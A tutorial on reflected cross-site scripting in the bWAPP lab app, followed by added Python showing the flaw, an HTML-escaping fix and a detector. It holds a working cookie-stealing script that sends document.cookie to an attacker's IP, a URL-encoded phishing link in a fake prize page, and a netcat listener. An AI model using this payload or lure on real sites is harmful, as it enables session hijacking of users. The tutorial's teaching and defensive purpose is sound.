Reflected XSS is the most common type of XSS. It occurs when the malicious payload is part of the request that the victim’s browser sends to the vulnerable site.
This type of attack is called “reflected” because a value from the HTTP request sent by the browser is immediately echoed back in the response page.
The attacker uses phishing emails and other social engineering techniques to convince the victim to open the malicious link.
Reflected XSS isn’t a persistent attack, so the attacker needs to deliver the payload to each victim separately.
For this tutorial we’ll use the bWAPP vulnerable web application.
Start the bee-box and verify its IP address (open the terminal and type “ifconfig”), in my case 192.168.1.15. Now open your browser and connect to the bee-box address. Log in and choose Cross-Site Scripting – Reflected (GET).
CHECK IF IT IS VULNERABLE
To test if the input fields are vulnerable, we try to inject this script:
If it is vulnerable, it will show us an alert box that says: XSS.
Since both fields are required, insert the script in the First name field and anything at all in the Last name field… As you can see, an alert box appears, which means the field is vulnerable. If you insert the script in the Last name field instead, you can see that it is vulnerable too.
Google Chrome uses an anti-XSS filter, so I suggest using Firefox for this test.
Now we will see how an attacker can steal the cookie with this type of vulnerability.
For this test I created a simple HTML page with the malicious link. In a real case the attacker could send this link by email or through a social network, and could hide the link by using a URL shortener like bit.ly.
In this page we’ll insert a script that will send the cookie to the attacker. This is the script:
<script>new Image().src="http://192.168.1.19/cookie.php?c="+ document.cookie;</script>
The image source points at my attacking listener, with the user’s cookie appended to the URL. Of course this URL doesn’t exist on my attacking site; I simply want to capture the request.
Now we need to URL-encode the script; you can do this on the freeformatter site. This is the encoded script:
This is the HTML page:
<h1 align="center">YOU WON!!</h1>
Click this <a href="http://192.168.1.15/bWAPP/xss_get.php?firstname=%3Cscript%3Enew+Image%28%29.src%3D%22http%3A%2F%2F192.168.1.19%2Fcookie.php%3Fc%3D%22%2B+document.cookie%3B%3C%2Fscript%3E&lastname=test&form=submit">link</a> to see your prize
Now we can send this file to the victim and set up a Netcat listener to receive the visitor’s session ID cookie. In Kali Linux open the terminal and type:
nc -lvp 80
We launch Netcat with these options:
- l: listen mode
- v: verbose
- p: local port to listen on (80)
When the victim opens this link in an authenticated session, the listener receives the victim’s cookie.
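To show the defect and its fix side by side, here is an added Python example (not bWAPP’s code or the tutorial’s) that reflects the two form fields the way the vulnerable page does, then renders the same input with HTML encoding applied, plus a small check that decodes logged request URLs and flags parameters carrying a payload like the one above; the collecting host in it is a placeholder.

```python
import html
from urllib.parse import parse_qs, unquote_plus, urlsplit

# Constructed stand-in for the vulnerable page: both GET parameters are
# written straight into the HTML response, exactly the defect bWAPP shows.
def render_vulnerable(firstname: str, lastname: str) -> str:
    return f"<p>Welcome {firstname} {lastname}</p>"

# Hardened form: HTML-encode every reflected value so '<', '>' and '"'
# become entities and the payload is rendered as text, not executed.
# (Pair this with an HttpOnly flag on the session cookie, so that
# document.cookie cannot read it even if another injection slips through.)
def render_hardened(firstname: str, lastname: str) -> str:
    safe_first = html.escape(firstname, quote=True)
    safe_last = html.escape(lastname, quote=True)
    return f"<p>Welcome {safe_first} {safe_last}</p>"

# Detection side: decode the query string of a logged request URL and list
# the parameters whose value carries a script tag, a javascript: URL or an
# inline event handler. Values are decoded a second time to catch double
# URL-encoding.
def query_params(url: str) -> dict:
    parsed = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return {name: values[0] for name, values in parsed.items()}

def looks_like_xss(value: str) -> bool:
    decoded = unquote_plus(value).lower()
    return ("<script" in decoded or "javascript:" in decoded
            or "onerror=" in decoded or "onload=" in decoded)

def flag_request(url: str) -> list:
    return [name for name, value in query_params(url).items()
            if looks_like_xss(value)]

# Constructed request URL with the same shape as the tutorial's link; the
# collecting host is a placeholder, not a real address.
ATTACK_URL = (
    "http://192.168.1.15/bWAPP/xss_get.php?firstname=%3Cscript%3Enew+Image"
    "%28%29.src%3D%22http%3A%2F%2FATTACKER-HOST%2Fcookie.php%3Fc%3D%22%2B+"
    "document.cookie%3B%3C%2Fscript%3E&lastname=test&form=submit"
)
BENIGN_URL = "http://192.168.1.15/bWAPP/xss_get.php?firstname=Alice&lastname=Smith&form=submit"

if __name__ == "__main__":
    first = query_params(ATTACK_URL)["firstname"]
    print(render_vulnerable(first, "test"))   # script tag survives intact
    print(render_hardened(first, "test"))     # &lt;script&gt; ... shown as text
    print(flag_request(ATTACK_URL), flag_request(BENIGN_URL))
```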